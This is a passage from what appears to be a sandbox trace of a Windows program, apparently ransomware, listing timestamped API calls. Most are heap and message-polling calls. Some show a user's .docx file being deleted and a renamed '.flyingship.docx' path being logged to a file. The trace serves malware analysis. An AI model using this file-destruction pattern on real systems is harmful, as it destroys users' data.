Size=0x8) returned 0x9c2618 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0171.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.890] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.890] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.892] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.892] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ds7b8_ jws.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0171.894] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.894] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.894] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.894] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0171.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.895] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.897] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.897] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.898] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0171.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.898] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.898] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.898] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFilePart=0x0) returned 0x47 [0171.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xbd07660, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0x90af58 [0171.899] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ds7b8_ jws.docx")) returned 1 [0171.905] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xbd07660, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0 [0171.905] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.905] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.907] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.907] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.907] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.908] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.908] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.908] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.908] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.909] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.909] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.909] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0171.909] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.909] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.910] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0171.910] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xf7e, lpOverlapped=0x0) returned 1 [0171.911] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0171.911] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xf7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.911] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0171.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0171.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x55) returned 0x8c4a48 [0171.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\n", cchWideChar=85, lpMultiByteStr=0x8c4a48, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 85 [0171.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0171.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0171.911] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x54, lpOverlapped=0x0) returned 1 [0171.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0171.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.912] CloseHandle (hObject=0x120) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0171.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0171.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0171.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, 